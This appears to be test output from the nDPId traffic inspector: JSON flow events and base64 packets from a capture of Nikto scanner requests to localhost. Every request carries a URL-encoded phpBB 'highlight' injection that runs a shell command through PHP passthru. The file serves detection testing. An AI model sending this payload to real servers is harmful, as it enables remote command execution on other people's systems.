{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} 
-01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01210{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
